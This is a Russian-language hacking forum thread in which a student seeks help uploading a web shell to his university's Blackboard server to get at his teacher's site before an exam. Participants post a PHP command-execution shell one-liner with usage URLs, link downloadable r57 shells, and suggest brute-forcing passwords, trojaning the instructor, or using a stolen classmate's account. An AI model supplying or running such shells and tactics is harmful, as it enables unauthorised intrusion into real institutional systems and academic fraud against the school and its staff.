Учитель имеет сайт на серваке университета. У каждого ученика на сайте университета (не учителя) свой экяунт. Через этот экяунт мы можем повылать ЛЮБЫЕ файлы учителю. Но когда посылаешь файл то учитель видет от кого он пришел. Также можно хранить на сервере файлы. Я пробовал залить на сервер файл r57shell.php - он его не берет, видимо потамучто файл много занимет. Также пробовал залить самодельный шелл shell.php в нем: <? system($_GET[c]); ?> Он его взял залил в ../upload/_3456/shell.php мне на моем экяунте показал ссылку этого файла. Я кликаю на ссылку то мне на белом окне вылетает <? system($_GET[c]); ?> Причем когда копируешь эту ссылку файла в буфер потом встовзяешь в internet explorer то те пишут ACCESS Denied. "Назад к учителю" У него сайт простой из html никаких скриптов. Мой вопрос у кого есть какие идеи чтоб туда шелл залить. Просто экламен через ниделю. Извините но полный адрес сайта учителя дать не могу. Да ща только что пробывал залить эту вышеперечисленую шеллу на другой провереный сервак то просто выпадает пустой скрин. Зарание спасибо.
дык наверное надо его юзать так http://www.xxx.com/shell.php?c=id или http://www.xxx.com/shell.php&c=id )
попробуй брутом пас угнать или трояном который можно впарить преподу и не со своего аккаунта. как вариант с забрученого аккаунта своего врага...
Попробуй вот так: <?php system($_GET['c']); ?> Пример использования (для винды) => xttp://site/shell.php?c=dir
Я попробовал туда свою "upload" форму залить, но у меня форма состоит из двух файлов "index.html" и "upload.pl" два файла залились нормально но когда начал заливать свой шелл через свою форму то получил вот такую ошибку HTTP Status 404 - /courses/1/CIS-121-emaxson/uploads/_136251_1/courses/1/CIS-121-emaxson/uploads/_136248_1/upload.pl -------------------------------------------------------------------------------- type Status report message /courses/1/CIS-121-emaxson/uploads/_136251_1/courses/1/CIS-121-emaxson/uploads/_136248_1/upload.pl description The requested resource (/courses/1/CIS-121-emaxson/uploads/_136251_1/courses/1/CIS-121-emaxson/uploads/_136248_1/upload.pl) is not available. т.е говорит что upload.pl в той папке нету. но когда открываю вот так hxxp://сайт.edu/courses/1/CIS-121-emaxson/uploads/_136248_1/upload.pl то он там Вот моя upload форма http://rapidshare.de/files/17066204/uploader.rar.html Может у кого есть upload форма одним файлом, а не двумя?
Да? странно... ну попробуй тогда написать там "123" - я уверен, покажет "123" ! Попробуй 12345qwe - покажет 12345qwe... Павел Глоба предсказывает что у тебя не стоит пхп...
ее................................................ нет................................... ------------------------------- кстати вариант... НО ИМХО врятле прокатит.
Знаеш что попробуй залить perl shell например r57pws взять можно отсюда http://rst.void.ru/download/r57pws.txt
EST a1ien Спасибо за шелл - переименовал её в .pl, залил таже история сервак открывает ее как в блокноте. В этой шеле надо же еще знать адрес перла не серваке. "Измените первую сроку скрипта "/usr/bin/perl" на корректный путь к интерпритатору перла на Вашем сервере." А как его узнать?
Я ща толь что се на сервак залил shell.php и shell.pl в которых в нутри только <?php system($_GET['c']); ?> и все больше никаких тагов нет. Пробовал hццp://www.xxx.com/shell.php?c=id или hццp://www.xxx.com/shell.php&c=id или xttp://site/shell.php?c=dir или hццp://www.xxx.com/shell.pl?c=id или hццp://www.xxx.com/shell.pl&c=id или xttp://site/shell.pl?c=dir Получаю пустой экран , при этом мой сервак поддерживает PHP и R57shell.php там работает нормально. Вот в общем файл который заливаю. http://rapidshare.de/files/17160217/shell.php.html Сам сервак университета должен есть перл потамучто webapps/portal/frameset.jsp?tab=courses&url=/bin/common/course.pl?course_id=_553_1 Только как узнать адресс перла на серваке? Чтоб работала http://rst.void.ru/download/r57pws.txt Сайт университета стоит на движке "Powered by Blackboard'"
